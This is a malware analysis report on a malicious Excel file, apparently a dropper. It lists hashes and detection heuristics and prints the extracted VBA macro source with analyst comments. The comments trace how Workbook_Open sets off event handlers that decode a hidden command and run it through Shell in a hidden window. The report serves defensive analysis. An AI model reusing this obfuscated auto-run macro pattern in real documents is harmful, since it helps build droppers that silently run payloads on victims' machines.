Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 41b23bad6fcaa948…

MALICIOUS

Office (OLE)

51.0 KB Created: 2018-10-16 16:44:32 Authoring application: Microsoft Excel First seen: 2019-08-04
MD5: 4e409e9637a96d88e46b6242a54b3d3d SHA-1: e723e32e46f2aa3effa8a4d51b565caffa0fbdf0 SHA-256: 41b23bad6fcaa948ef20dba9a8d4dd1e31e1f6979f6888b49cc6e7d88a02723d
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

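The file is an Excel document containing VBA macros. A Workbook_Open macro is present, so code runs automatically when the workbook is opened with macros enabled, and a separate critical heuristic fires for a Shell() call. In the extracted source below, the Shell() call sits in a UserForm1 change handler that Workbook_Open reaches indirectly by writing to form controls, and the command string is built at run time from form control values rather than appearing as a literal. This indicates the macro is designed to execute arbitrary commands, likely for downloading and running a secondary payload. The ClamAV detection name, which classifies the file as a dropper, further supports its malicious nature.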

Heuristics 4

  • ClamAV: Xls.Malware.Dropperx-6923123-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Dropperx-6923123-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3609 bytes
SHA-256: 091f074eec8bc259b7426546fca18ada1023f7a6d4e1886c025e52a195a03632
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-run entry point: Excel raises Workbook_Open when the workbook is opened
' with macros enabled. Nothing here looks harmful in isolation; it only passes
' a literal to new_report_create, which writes it into UserForm1.price.
' That write is what starts the chain price_Change -> doc_enabled ->
' TextBox1_Change -> Shell.
Sub Workbook_Open()
' The value "25000" is not read again by any handler in this listing; it only
' has to change the control's value so that the Change event fires.
a2 = "25000"
new_report_create a2
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
' Looks up the character arg1 in the lookup string UserForm1.outtext.
' On return pointA holds the 1-based position found by copyDocument, or 0 when
' copyDocument finds no match.
Sub new_document1(arg1, ByRef pointA)
' 0 is the "not found" result; copyDocument overwrites it only on a match.
pointA = 0
' Search starts at position 1 of UserForm1.outtext.
ar2 = 1
copyDocument ar2, pointA, arg1
End Sub
  


' Returns in minA the single character of UserForm1.outtext at position b1.
' Positions below 1 wrap around to the end of the string (Len + b1).
' The only caller in this listing passes (found position - 2), so together
' with new_document1 this maps each character to the one two places earlier
' in UserForm1.outtext: a fixed-shift substitution over that alphabet.
Sub replace_mask(b1, ByRef minA)
' No-op: assigns b1 the value it already has. Filler code.
If b1 = -1 Then
b1 = -1
End If
minA = ""
If b1 < 1 Then
' Wrap-around case: b1 is 0 or negative, so index from the end.
changeDocument UserForm1.outtext, Len(UserForm1.outtext) + b1, minA
Else
changeDocument UserForm1.outtext, b1, minA
End If
End Sub

' Decoder loop, written as recursion instead of For/Next.
' state_max : 1-based index of the character of a1 being processed (ByRef,
'             incremented on each step)
' maxA      : accumulator that receives the decoded text (ByRef)
' a1        : the encoded input string
' Each step takes one character of a1, finds its position in
' UserForm1.outtext, substitutes the character two positions earlier
' (wrapping), and appends it to maxA. Recursion depth equals Len(a1).
Sub task_set_values(ByRef state_max, ByRef maxA, a1)
up1 = Len(a1)
If state_max <= up1 Then
low1 = ""
' low1 = character of a1 at position state_max.
changeDocument a1, state_max, low1
life2 = 1
' life2 = position of low1 in UserForm1.outtext (0 if not found).
new_document1 low1, life2
sub2 = ""
' sub2 = substituted character at (life2 - 2) in UserForm1.outtext.
replace_mask life2 - 2, sub2
maxA = maxA + sub2
state_max = state_max + 1
' Tail call for the next character; stops when state_max exceeds Len(a1).
task_set_values state_max, maxA, a1
End If
End Sub


' Decodes the value of UserForm1.date1 and writes the result into the form.
' Called from price_Change. The final write to TextBox1 is the step that
' raises TextBox1_Change, where the decoded text is passed to Shell.
' NOTE(review): the contents of date1 (encoded input) and outtext (alphabet)
' are not part of this VBA listing; presumably they are stored as control
' properties in the UserForm storage of the document - confirm there.
Sub doc_enabled()
f_stop = ""
' f_stop receives the decoded string.
task_scrub_cpc UserForm1.date1, f_stop
With UserForm1
' Staged through a second control named "line" before reaching TextBox1.
.line = f_stop
.TextBox1 = .line
End With
End Sub

' Thin wrapper that initialises the decoder state and starts it.
' Arg2   : encoded input string
' opcode : receives the decoded output (ByRef); reset to "" first
Sub task_scrub_cpc(Arg2, ByRef opcode)
' Start at the first character of Arg2.
long1 = 1
opcode = ""
task_set_values long1, opcode, Arg2
End Sub














' Character-at-index helper: sets control to the one character of pmin at the
' 1-based position given by the second argument. Left/Right are combined to
' avoid a direct Mid() call.
' The second parameter's name (fpSymGetLineFromAddr64) is unrelated to its use;
' it is only an integer index. Names like this are obfuscation noise.
Sub changeDocument(pmin, fpSymGetLineFromAddr64, ByRef control)
control = Right(Left(pmin, fpSymGetLineFromAddr64), 1)
End Sub



' Recursive linear search for the character HANDLE in UserForm1.outtext.
' second : current 1-based position (ByRef, advanced on each miss)
' Cell1  : set to the matching position on a hit; left untouched otherwise
' HANDLE : the character being looked for
' Because the test is "second < s", the last character of UserForm1.outtext
' is never compared.
Sub copyDocument(ByRef second, ByRef Cell1, HANDLE)
' Dead store: overwritten by the next line.
s = 1
s = Len(UserForm1.outtext)
If second < s Then
up2 = ""
' up2 = character of UserForm1.outtext at position second.
changeDocument UserForm1.outtext, second, up2
If HANDLE <> up2 Then
second = second + 1
copyDocument second, Cell1, HANDLE
Else
Cell1 = second
End If
End If
End Sub

'create module

' Writes check into the UserForm1.price control. Called from Workbook_Open.
' The assignment matters for its side effect: changing the control's value
' raises price_Change, which continues the chain toward the Shell call.
Sub new_report_create(check)
UserForm1.price = check
End Sub







Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{A8BABEFE-FD7B-4914-8F41-D701A419C1EE}{7BBB8CE4-9F37-4EAF-B84F-A43F8E3C8F10}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


' Empty Change handler for the date1 control; it contains only a comment.
' date1 itself is significant: doc_enabled reads it as the encoded input.
Private Sub date1_Change()
'28.08.2017
End Sub


' Change handler for the price control. Runs when new_report_create writes to
' UserForm1.price and hands control to doc_enabled, which decodes the command.
' Event handlers are used as hops so that no direct call path links
' Workbook_Open to Shell.
Private Sub price_Change()
'level text
doc_enabled
End Sub


' Execution sink. Runs when doc_enabled writes the decoded string into
' TextBox1, then passes that string to Shell.
' Most assignments below are junk: a2 and jtask are overwritten repeatedly and
' jtask is never read. Only three values matter:
'   i1   = 4000
'   just = i1 - 4000 = 0
'   a2   = UserForm1.TextBox1 (the decoded command string)
' Analyst note: the command is not a literal anywhere in this source. It can be
' recovered statically by applying the shift-by-two substitution to the date1
' value using the outtext alphabet, without opening the document.
Private Sub TextBox1_Change()
i1 = 40 * 100
a2 = "22"
jtask = "54"
a2 = "1021"
jtask = "57"
a2 = "75"
a2 = "52"
' Always evaluates to 0 (4000 - 4000); an arithmetic disguise for a constant.
just = i1 - 10 * 400
a2 = "86"
' The last assignment to a2 before the Shell call: the decoded command.
a2 = UserForm1.TextBox1
jtask = "7"
jtask = "36"
' Always true, since just is 0.
If 0 = just Then
'replce1 string2 to n in max
' Window style 0 is vbHide, so the launched process has no visible window.
Shell a2, just
End If
' Everything after this point is dead code with no effect on behavior.
jtask = "10"
jtask = "33"
a2 = "70"
a2 = "9"
a2 = "21"
a2 = "74"
End Sub